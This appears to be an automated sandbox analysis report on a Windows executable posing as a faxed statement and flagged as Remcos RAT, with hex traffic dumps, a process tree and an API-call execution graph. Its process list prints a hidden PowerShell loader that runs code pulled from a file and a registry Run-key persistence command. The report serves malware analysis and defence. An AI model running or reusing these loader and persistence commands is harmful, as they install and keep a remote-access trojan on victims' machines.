                                                                                            Data Ascii: cTV0#&Nw(%EHutJXU|? Kv&mq2x-6qHE-6CmhQ 202h@1B*I#:>JYw,xL#<*,i|:_dMzl=B_`Y6=^}'.;]vN?0}py7$RR
                                                                                            2025-01-03 04:08:29 UTC1024INData Raw: 50 39 8e db 5c 00 aa 09 54 9e 7d e1 bb 3c 86 0a 94 6b d2 39 0b ed be 92 5d df 23 52 56 0c cb cb 92 c3 37 39 75 27 01 3d ff f7 a3 1c 14 bf 0a fe 20 06 82 f6 04 c6 e1 30 d0 ee db 14 31 5b 62 5b b4 72 d4 da 33 8c 43 a3 bf 27 91 12 64 99 36 5b 70 cb 2b 6d c2 d5 dd d0 f6 69 ea 4a d3 06 9a 42 ba f1 18 98 ef 4b c7 4b b1 02 7e fa 07 75 b0 1f 5d a8 f1 b5 aa 27 11 a7 52 bd bd 5f 87 fa ed 4a 2e d6 6d 40 dc 1f 0c 30 cd 74 78 fc 3a b1 10 37 50 ad d6 75 ff 9d 6f 76 d2 c3 2e 7a 0b 79 1b 41 d7 aa 2f 9f 08 48 be 46 14 8f 96 9c 3a 71 25 64 d2 46 f4 64 81 f6 c1 77 34 f2 45 59 67 9c 7e 6b e0 3c 42 8d 70 f5 89 e0 ea 6e a8 61 d0 16 4a e0 f8 f3 c2 53 be 02 de 55 80 49 b5 30 7f bc 28 60 ba 2d d9 8d 5d dd 69 a2 49 e3 f7 f4 3f 4f 96 05 33 cb 82 fa d0 c8 25 14 30 0f cb 67 a1 37 1a
                                                                                            Data Ascii: P9\T}<k9]#RV79u'= 01[b[r3C'd6[p+miJBKK~u]'R_J.m@0tx:7Puov.zyA/HF:q%dFdw4EYg~k<BpnaJSUI0(`-]iI?O3%0g7
                                                                                            2025-01-03 04:08:29 UTC16384INData Raw: ea 63 88 ea 69 8b e1 e6 45 ca bf 89 a1 2a 6e af e6 ec 5d 23 91 f0 1e b6 db a1 50 07 6d a6 44 76 f4 14 da fb 14 4a e5 e5 42 e0 d1 2e 59 92 97 ee 7f a7 99 88 95 ca 27 ea 59 44 f2 fd 99 03 0f 06 92 fe 5d 98 cd 6a 63 4b ca 3a cf f2 d8 e9 e7 60 e1 4f 57 ba 0c ce c8 da d4 84 89 67 f4 f9 77 10 08 55 18 56 13 03 89 63 34 15 5a ae ac 1a 8d 3d 41 fc 51 ea 1c a3 84 bf 09 f3 2a f8 2d 8a 1d 83 37 b6 7d 9e 1a 54 a8 98 ca fc 2b 2f 72 c9 e6 3e 5c 6e f5 15 4d 2c 38 eb 5a 4b 7e 38 31 e7 8d 97 f9 57 d3 d0 1f 9b 57 be 4c 84 f2 67 0f 76 0a 7e 7c 81 3c ad 10 fb 9a 55 10 91 55 33 9f 73 63 9b 8a 37 49 ee 3f 10 a7 f6 40 1a db 71 cf ae 1d de ed b4 a6 c7 21 fb f2 29 f6 1a 99 bd a0 92 77 d6 94 6e d3 75 22 0f f0 a2 67 8a 11 c6 c5 08 58 a4 f6 b9 ca f4 3f ec b8 ae 8e f1 92 5f 9d f3 79
                                                                                            Data Ascii: ciE*n]#PmDvJB.Y'YD]jcK:`OWgwUVc4Z=AQ*-7}T+/r>\nM,8ZK~81WWLgv~|<UU3sc7I?@q!)wnu"gX?_y
                                                                                            2025-01-03 04:08:29 UTC1024INData Raw: 28 c7 e1 ad 5f 16 15 a5 ca a0 ab 81 80 f9 2e e5 e2 8f f0 99 ce 05 79 96 7b 11 19 c7 0f 00 00 bb 12 29 8e 55 51 b2 49 c3 d7 5a 85 79 fb 9a 42 14 39 da 95 5f a2 79 dc 1f 9c b7 10 98 1b 34 dd dd 93 bc 59 6c 58 6a 0c 1b 4c 18 fd 21 bc 50 da a1 6a fc ac 5b eb 75 68 2f b2 95 c1 8e ca 4c 4a 50 6b 3e b4 c8 65 a1 f4 3d 22 df f7 f8 6a 1b cc 79 43 e4 d8 dc 0c dd 16 46 c8 89 b9 4d a8 45 09 16 23 25 86 c7 3a 47 95 f5 7e b5 31 f1 ee 0a 41 02 54 66 0b 2d 95 68 81 39 c8 bb e3 13 8f 4b e8 f8 84 ee 06 96 67 0b a2 2d 48 0c 5c e3 3a 25 e7 7e f3 c5 75 37 73 46 d4 59 7b 0b 2d 28 7a 99 f4 a6 4c 88 30 c3 60 93 95 d6 65 40 99 43 06 66 cf 71 8d c8 72 4b b0 cd 2b 1c 71 23 6a 70 ae db a1 29 d3 db cf fb 21 7e 37 5f d8 e6 62 02 aa c7 1d 58 33 be 6a ea 4b 75 d2 1a 5c d5 0e 01 ec e9 d5
                                                                                            Data Ascii: (_.y{)UQIZyB9_y4YlXjL!Pj[uh/LJPk>e="jyCFME#%:G~1ATf-h9Kg-H\:%~u7sFY{-(zL0`e@CfqrK+q#jp)!~7_bX3jKu\
                                                                                            2025-01-03 04:08:29 UTC1749INData Raw: bb af db 75 dc d7 87 b5 fb 9e 85 65 dc aa e7 3a e7 4c 58 19 3f d4 56 8f 71 7c da ee 95 de 8b f2 ff d7 48 b0 df 93 e8 c2 ed fd dd f8 91 b6 1c f5 e7 2b 03 09 69 37 b2 b7 82 69 7c ed ae 29 a3 d9 68 ad b9 de a9 e7 0f 16 19 10 23 e4 d3 e2 50 3e 33 24 bf b1 a1 02 96 7c a8 d5 bc 35 fb 99 19 30 f0 7c a5 d8 e5 69 ff 3b fc b5 67 67 5d bc 8d af 25 1b a9 3d 69 14 fb cc 3c de c4 9a e2 8d d5 ee 82 64 8b bc 92 6e ef 53 3c 54 29 0c 65 d2 95 95 8e f2 c7 9f a8 7f a1 e0 ae d1 df 07 e1 0d 90 da 60 ee 7c a1 4d 3a 35 1a 29 fc b2 61 8b 5d 9d 24 44 eb a8 c2 04 26 8e 3d 31 3a a9 9e 4e 42 f4 33 91 22 74 9b aa b7 e9 f8 b3 c1 ab 58 8d 81 69 d8 46 4c 46 ee 55 f4 a7 7a fb 6a b3 18 79 f9 15 3e d3 9a 38 ee 8c c5 44 01 61 92 f1 7e b9 b1 17 6e 0f 3a 6f ca 21 42 af 3f 19 c0 41 9d de ba 56
                                                                                            Data Ascii: ue:LX?Vq|H+i7i|)h#P>3$|50|i;gg]%=i<dnS<T)e`|M:5)a]$D&=1:NB3"tXiFLFUzjy>8Da~n:o!B?AV
                                                                                            2025-01-03 04:08:29 UTC16384INData Raw: 27 1a 38 99 40 6d e0 6e 85 ae ff 70 d2 02 22 dd 09 c4 72 e6 43 e1 ac cc 70 e1 9e 49 e0 4c 91 3d 60 a0 48 fa fd 4b 63 9d 4b fe 0f b2 57 90 9e 34 e3 ed 4a 73 4e d5 f8 41 83 d6 2f 5f 1f 44 e2 e9 5a 1f 12 a4 55 da 00 f3 85 a3 b6 0d 00 ab dc ea e9 9e 4f 6d 79 89 e9 ef d7 28 3c 4c b7 2d 8d 05 84 9d 44 16 1b fd f9 a9 e0 45 70 21 c2 13 1c 8c c1 f7 04 50 73 f8 6c 37 d3 e2 24 2c df 4a 7d f0 ad 42 ba 9f da 6e 67 a2 9a 63 9b 89 30 ef c6 4f 54 55 8b c1 84 7d 71 43 f4 36 4f 63 b6 c1 46 e0 16 0a eb 2c fb ef 1b ee 1d 61 31 15 b2 bf 2a 2e 11 a0 f8 63 4e 20 9a 40 51 5c f7 6c c8 f5 0e 9c 8c 93 38 a5 51 7f 93 d6 a1 fd 9f da 88 a1 ca 83 c6 a8 9c f5 c0 49 95 d8 74 5d 94 0f 36 6a 01 b6 a5 9f 94 b3 03 b3 4d 1c da 43 e4 ad eb 34 00 82 1b b6 c6 f5 4a c7 ab 0f da 5f 47 ab 06 4b 66
                                                                                            Data Ascii: '8@mnp"rCpIL=`HKcKW4JsNA/_DZUOmy(<L-DEp!Psl7$,J}Bngc0OTU}qC6OcF,a1*.cN @Q\l8QIt]6jMC4J_GKf
                                                                                            2025-01-03 04:08:29 UTC1024INData Raw: 20 8f f7 d0 49 82 06 8e 17 11 2f d1 0f 13 bd 7e d1 cc 5f 6b 2d a8 f3 30 06 8d 1e 62 79 39 19 39 c5 32 1f bf f9 82 7d 5f 94 b2 7e 24 31 e4 23 33 d8 de c1 9e 06 37 7d 38 7e 5f 18 ea 53 3e 42 dc de f2 43 ee 8a 43 66 45 ae 59 74 76 3d 47 fb 1b a8 ff c3 ec 47 28 d3 a5 c8 4c 97 5e 99 39 8e a1 5a 1a d4 a8 6e 88 46 a6 6b 6d d8 a8 1b 3c 87 6c 46 20 c4 e0 9b 61 9b 7b 49 74 ef c7 10 21 32 48 59 86 2b 94 f1 cf e1 c0 df 10 03 33 2c 0c ac 20 b1 31 9d c3 23 ef ed 1e 25 7a e6 1e cb 5a 11 59 3c c1 83 ab 40 d4 b8 03 a1 20 75 57 ba bd 2b 9b 03 4d 7d 6c cf 59 5b 7d 53 26 84 48 76 fb a2 4d 25 35 4d 5b f8 a7 09 c5 f3 06 8f 6e 2e 34 b0 f7 2a d1 c5 19 ad 97 7b a3 fc 0c 4a ef 8a 9c fc e1 27 60 37 27 1f 7f 75 01 29 4a c1 cb e5 15 a2 35 9b 0e cb be 86 81 6c fc 3d a0 44 c6 b1 99 1f
                                                                                            Data Ascii: I/~_k-0by992}_~$1#37}8~_S>BCCfEYtv=GG(L^9ZnFkm<lF a{It!2HY+3, 1#%zZY<@ uW+M}lY[}S&HvM%5M[n.4*{J'`7'u)J5l=D
                                                                                            2025-01-03 04:08:29 UTC16384INData Raw: 3f 09 9f 1a 80 be a6 ba fe 4e 0e d9 24 5d 54 f6 d2 8b a2 5b ec c9 bc 0e 28 f8 ec a6 30 9d 56 90 c6 27 74 70 d1 f2 79 f5 85 52 82 ed f1 a4 4f 3f 7d 6e 8f 7a 7a 4a 95 44 d2 b0 03 08 1b da c7 21 58 e6 c8 33 8c b8 b4 a6 d6 af fb f3 9c f0 3e 18 73 0a ca d0 24 37 52 cc 53 cc d4 dc da 28 88 9c c5 4a ba fb 01 94 16 33 5e 4b c0 0e 08 c4 d1 5b 61 e2 d2 f0 85 b6 e1 d0 2a 10 24 14 1f 5b 6b 9f b4 17 9a f9 db 7c c3 67 a7 21 2d bb 19 ad 75 2b c3 14 79 c5 93 93 dd a2 4d b2 44 b6 e3 8b 3f 8b 61 02 e2 1b 03 d0 8e d3 18 af 8b 06 f8 01 14 f3 1d fd 33 fa 26 72 19 a7 53 dd ca a1 78 12 55 2a 5c 29 34 9b ab 1f d6 f8 32 06 a4 27 5b 14 62 72 07 ad f5 14 8a f5 e2 fb c6 6b 5c 01 c7 50 94 be 28 79 86 ed f9 68 1d 46 ff a8 f5 10 3a 70 f5 a8 2c b9 a4 62 29 6e c9 21 81 f1 c0 99 e5 94 59
                                                                                            Data Ascii: ?N$]T[(0V'tpyRO?}nzzJD!X3>s$7RS(J3^K[a*$[k|g!-u+yMD?a3&rSxU*\)42'[brk\P(yhF:p,b)n!Y


                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:23:07:21
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:825'320 bytes
                                                                                            MD5 hash:B1CC8BFFF304FDD1BD2597ACB9E0E3BC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:1
                                                                                            Start time:23:07:21
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell.exe -windowstyle hidden "$hjhedens=gc -Raw 'C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes\Thionylamine.asf';$Trkgardiner=$hjhedens.SubString(8275,3);.$Trkgardiner($hjhedens)"
                                                                                            Imagebase:0xdc0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:23:07:21
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:23:08:11
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                            Imagebase:0xc60000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:7
                                                                                            Start time:23:08:25
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ventetiders38" /t REG_EXPAND_SZ /d "%Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)"
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:8
                                                                                            Start time:23:08:25
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:9
                                                                                            Start time:23:08:25
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ventetiders38" /t REG_EXPAND_SZ /d "%Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)"
                                                                                            Imagebase:0xad0000
                                                                                            File size:59'392 bytes
                                                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:10
                                                                                            Start time:23:08:32
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\snncbfhsilpxcsxwccghl"
                                                                                            Imagebase:0xc60000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:11
                                                                                            Start time:23:08:32
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\snncbfhsilpxcsxwccghl"
                                                                                            Imagebase:0x7ff70f330000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:12
                                                                                            Start time:23:08:32
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dpsucystvthkeylilntioief"
                                                                                            Imagebase:0xc60000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:13
                                                                                            Start time:23:08:32
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fjxfcqcnjbzoofhmcxfkznqovmy"
                                                                                            Imagebase:0xc60000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:14
                                                                                            Start time:23:08:32
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fjxfcqcnjbzoofhmcxfkznqovmy"
                                                                                            Imagebase:0xc60000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:20.6%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:16.4%
                                                                                              Total number of Nodes:1377
                                                                                              Total number of Limit Nodes:32
                                                                                              execution_graph 3225 403640 SetErrorMode GetVersionExW 3226 403692 GetVersionExW 3225->3226 3227 4036ca 3225->3227 3226->3227 3228 403723 3227->3228 3229 406a35 5 API calls 3227->3229 3316 4069c5 GetSystemDirectoryW 3228->3316 3229->3228 3231 403739 lstrlenA 3231->3228 3232 403749 3231->3232 3319 406a35 GetModuleHandleA 3232->3319 3235 406a35 5 API calls 3236 403757 3235->3236 3237 406a35 5 API calls 3236->3237 3238 403763 #17 OleInitialize SHGetFileInfoW 3237->3238 3325 406668 lstrcpynW 3238->3325 3241 4037b0 GetCommandLineW 3326 406668 lstrcpynW 3241->3326 3243 4037c2 3327 405f64 3243->3327 3246 4038f7 3247 40390b GetTempPathW 3246->3247 3331 40360f 3247->3331 3249 403923 3251 403927 GetWindowsDirectoryW lstrcatW 3249->3251 3252 40397d DeleteFileW 3249->3252 3250 405f64 CharNextW 3254 4037f9 3250->3254 3255 40360f 12 API calls 3251->3255 3341 4030d0 GetTickCount GetModuleFileNameW 3252->3341 3254->3246 3254->3250 3259 4038f9 3254->3259 3257 403943 3255->3257 3256 403990 3260 403a54 3256->3260 3262 403a45 3256->3262 3266 405f64 CharNextW 3256->3266 3257->3252 3258 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3257->3258 3261 40360f 12 API calls 3258->3261 3427 406668 lstrcpynW 3259->3427 3481 403c25 3260->3481 3265 403975 3261->3265 3371 403d17 3262->3371 3265->3252 3265->3260 3283 4039b2 3266->3283 3269 403b91 3272 403b99 GetCurrentProcess OpenProcessToken 3269->3272 3273 403c0f ExitProcess 3269->3273 3270 403b7c 3490 405cc8 3270->3490 3277 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3272->3277 3278 403bdf 3272->3278 3274 403a1b 3428 40603f 3274->3428 3275 403a5c 3444 405c33 3275->3444 3277->3278 3281 406a35 5 API calls 3278->3281 3285 403be6 3281->3285 3283->3274 3283->3275 3287 403bfb ExitWindowsEx 3285->3287 3292 403c08 3285->3292 3287->3273 3287->3292 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3260 3290 403a9d 3289->3290 3293 403aa2 3290->3293 3294 403aa9 3290->3294 3494 40140b 3292->3494 3447 405b99 CreateDirectoryW 3293->3447 3452 405c16 CreateDirectoryW 3294->3452 3295 403a3a 3443 406668 lstrcpynW 3295->3443 3301 403aae SetCurrentDirectoryW 3302 403ac0 3301->3302 3303 403acb 3301->3303 3455 406668 lstrcpynW 3302->3455 3456 406668 lstrcpynW 3303->3456 3308 403b19 CopyFileW 3313 403ad8 3308->3313 3309 403b63 3311 406428 36 API calls 3309->3311 3311->3260 3312 4066a5 17 API calls 3312->3313 3313->3309 3313->3312 3315 403b4d CloseHandle 3313->3315 3457 4066a5 3313->3457 3474 406428 MoveFileExW 3313->3474 3478 405c4b CreateProcessW 3313->3478 3315->3313 3317 4069e7 wsprintfW LoadLibraryExW 3316->3317 3317->3231 3320 406a51 3319->3320 3321 406a5b GetProcAddress 3319->3321 3322 4069c5 3 API calls 3320->3322 3323 403750 3321->3323 3324 406a57 3322->3324 3323->3235 3324->3321 3324->3323 3325->3241 3326->3243 3328 405f6a 3327->3328 3329 4037e8 CharNextW 3328->3329 3330 405f71 CharNextW 3328->3330 3329->3254 3330->3328 3497 4068ef 3331->3497 3333 403625 3333->3249 3334 40361b 3334->3333 3506 405f37 lstrlenW CharPrevW 3334->3506 3337 405c16 2 API calls 3338 403633 3337->3338 3509 406187 3338->3509 3513 406158 GetFileAttributesW CreateFileW 3341->3513 3343 403113 3370 403120 3343->3370 3514 406668 lstrcpynW 3343->3514 3345 403136 3515 405f83 lstrlenW 3345->3515 3349 403147 GetFileSize 3350 403241 3349->3350 3369 40315e 3349->3369 3520 40302e 3350->3520 3354 403286 GlobalAlloc 3357 40329d 3354->3357 3356 4032de 3358 40302e 32 API calls 3356->3358 3361 406187 2 API calls 3357->3361 3358->3370 3359 403267 3360 4035e2 ReadFile 3359->3360 3363 403272 3360->3363 3362 4032ae CreateFileW 3361->3362 3365 4032e8 3362->3365 3362->3370 3363->3354 3363->3370 3364 40302e 32 API calls 3364->3369 3535 4035f8 SetFilePointer 3365->3535 3367 4032f6 3536 403371 3367->3536 3369->3350 3369->3356 3369->3364 3369->3370 3551 4035e2 3369->3551 3370->3256 3372 406a35 5 API calls 3371->3372 3373 403d2b 3372->3373 3374 403d31 3373->3374 3375 403d43 3373->3375 3613 4065af wsprintfW 3374->3613 3614 406536 3375->3614 3379 403d92 lstrcatW 3380 403d41 3379->3380 3598 403fed 3380->3598 3381 406536 3 API calls 3381->3379 3384 40603f 18 API calls 3385 403dc4 3384->3385 3386 403e58 3385->3386 3388 406536 3 API calls 3385->3388 3387 40603f 18 API calls 3386->3387 3389 403e5e 3387->3389 3395 403df6 3388->3395 3390 403e6e LoadImageW 3389->3390 3391 4066a5 17 API calls 3389->3391 3392 403f14 3390->3392 3393 403e95 RegisterClassW 3390->3393 3391->3390 3397 40140b 2 API calls 3392->3397 3396 403ecb SystemParametersInfoW CreateWindowExW 3393->3396 3426 403f1e 3393->3426 3394 403e17 lstrlenW 3399 403e25 lstrcmpiW 3394->3399 3400 403e4b 3394->3400 3395->3386 3395->3394 3398 405f64 CharNextW 3395->3398 3396->3392 3401 403f1a 3397->3401 3402 403e14 3398->3402 3399->3400 3403 403e35 GetFileAttributesW 3399->3403 3404 405f37 3 API calls 3400->3404 3407 403fed 18 API calls 3401->3407 3401->3426 3402->3394 3406 403e41 3403->3406 3405 403e51 3404->3405 3619 406668 lstrcpynW 3405->3619 3406->3400 3410 405f83 2 API calls 3406->3410 3408 403f2b 3407->3408 3411 403f37 ShowWindow 3408->3411 3412 403fba 3408->3412 3410->3400 3413 4069c5 3 API calls 3411->3413 3606 40579d OleInitialize 3412->3606 3415 403f4f 3413->3415 3419 403f5d GetClassInfoW 3415->3419 3421 4069c5 3 API calls 3415->3421 3416 403fc0 3417 403fc4 3416->3417 3418 403fdc 3416->3418 3424 40140b 2 API calls 3417->3424 3417->3426 3420 40140b 2 API calls 3418->3420 3422 403f71 GetClassInfoW RegisterClassW 3419->3422 3423 403f87 DialogBoxParamW 3419->3423 3420->3426 3421->3419 3422->3423 3425 40140b 2 API calls 3423->3425 3424->3426 3425->3426 3426->3260 3427->3247 3635 406668 lstrcpynW 3428->3635 3430 406050 3636 405fe2 CharNextW CharNextW 3430->3636 3433 403a27 3433->3260 3442 406668 lstrcpynW 3433->3442 3434 4068ef 5 API calls 3440 406066 3434->3440 3435 406097 lstrlenW 3436 4060a2 3435->3436 3435->3440 3438 405f37 3 API calls 3436->3438 3439 4060a7 GetFileAttributesW 3438->3439 3439->3433 3440->3433 3440->3435 3441 405f83 2 API calls 3440->3441 3642 40699e FindFirstFileW 3440->3642 3441->3435 3442->3295 3443->3262 3445 406a35 5 API calls 3444->3445 3446 403a61 lstrcatW 3445->3446 3446->3288 3446->3289 3448 403aa7 3447->3448 3449 405bea GetLastError 3447->3449 3448->3301 3449->3448 3450 405bf9 SetFileSecurityW 3449->3450 3450->3448 3451 405c0f GetLastError 3450->3451 3451->3448 3453 405c26 3452->3453 3454 405c2a GetLastError 3452->3454 3453->3301 3454->3453 3455->3303 3456->3313 3461 4066b2 3457->3461 3458 4068d5 3459 403b0d DeleteFileW 3458->3459 3647 406668 lstrcpynW 3458->3647 3459->3308 3459->3313 3461->3458 3462 4068a3 lstrlenW 3461->3462 3463 4066a5 10 API calls 3461->3463 3464 4067ba GetSystemDirectoryW 3461->3464 3467 406536 3 API calls 3461->3467 3468 4067cd GetWindowsDirectoryW 3461->3468 3469 4066a5 10 API calls 3461->3469 3470 406844 lstrcatW 3461->3470 3471 4068ef 5 API calls 3461->3471 3472 4067fc SHGetSpecialFolderLocation 3461->3472 3645 4065af wsprintfW 3461->3645 3646 406668 lstrcpynW 3461->3646 3462->3461 3463->3462 3464->3461 3467->3461 3468->3461 3469->3461 3470->3461 3471->3461 3472->3461 3473 406814 SHGetPathFromIDListW CoTaskMemFree 3472->3473 3473->3461 3475 406449 3474->3475 3476 40643c 3474->3476 3475->3313 3648 4062ae 3476->3648 3479 405c8a 3478->3479 3480 405c7e CloseHandle 3478->3480 3479->3313 3480->3479 3482 403c40 3481->3482 3483 403c36 CloseHandle 3481->3483 3484 403c54 3482->3484 3485 403c4a CloseHandle 3482->3485 3483->3482 3682 403c82 3484->3682 3485->3484 3493 405cdd 3490->3493 3491 403b89 ExitProcess 3492 405cf1 MessageBoxIndirectW 3492->3491 3493->3491 3493->3492 3495 401389 2 API calls 3494->3495 3496 401420 3495->3496 3496->3273 3498 4068fc 3497->3498 3500 406965 CharNextW 3498->3500 3501 406972 3498->3501 3503 405f64 CharNextW 3498->3503 3504 406951 CharNextW 3498->3504 3505 406960 CharNextW 3498->3505 3499 406977 CharPrevW 3499->3501 3500->3498 3500->3501 3501->3499 3502 406998 3501->3502 3502->3334 3503->3498 3504->3498 3505->3500 3507 405f53 lstrcatW 3506->3507 3508 40362d 3506->3508 3507->3508 3508->3337 3510 406194 GetTickCount GetTempFileNameW 3509->3510 3511 40363e 3510->3511 3512 4061ca 3510->3512 3511->3249 3512->3510 3512->3511 3513->3343 3514->3345 3516 405f91 3515->3516 3517 40313c 3516->3517 3518 405f97 CharPrevW 3516->3518 3519 406668 lstrcpynW 3517->3519 3518->3516 3518->3517 3519->3349 3521 403057 3520->3521 3522 40303f 3520->3522 3524 403067 GetTickCount 3521->3524 3525 40305f 3521->3525 3523 403048 DestroyWindow 3522->3523 3528 40304f 3522->3528 3523->3528 3527 403075 3524->3527 3524->3528 3555 406a71 3525->3555 3529 4030aa CreateDialogParamW ShowWindow 3527->3529 3530 40307d 3527->3530 3528->3354 3528->3370 3554 4035f8 SetFilePointer 3528->3554 3529->3528 3530->3528 3559 403012 3530->3559 3532 40308b wsprintfW 3562 4056ca 3532->3562 3535->3367 3537 403380 SetFilePointer 3536->3537 3538 40339c 3536->3538 3537->3538 3573 403479 GetTickCount 3538->3573 3543 403479 42 API calls 3544 4033d3 3543->3544 3545 40343f ReadFile 3544->3545 3548 4033e2 3544->3548 3550 403439 3544->3550 3545->3550 3547 4061db ReadFile 3547->3548 3548->3547 3548->3550 3588 40620a WriteFile 3548->3588 3550->3370 3552 4061db ReadFile 3551->3552 3553 4035f5 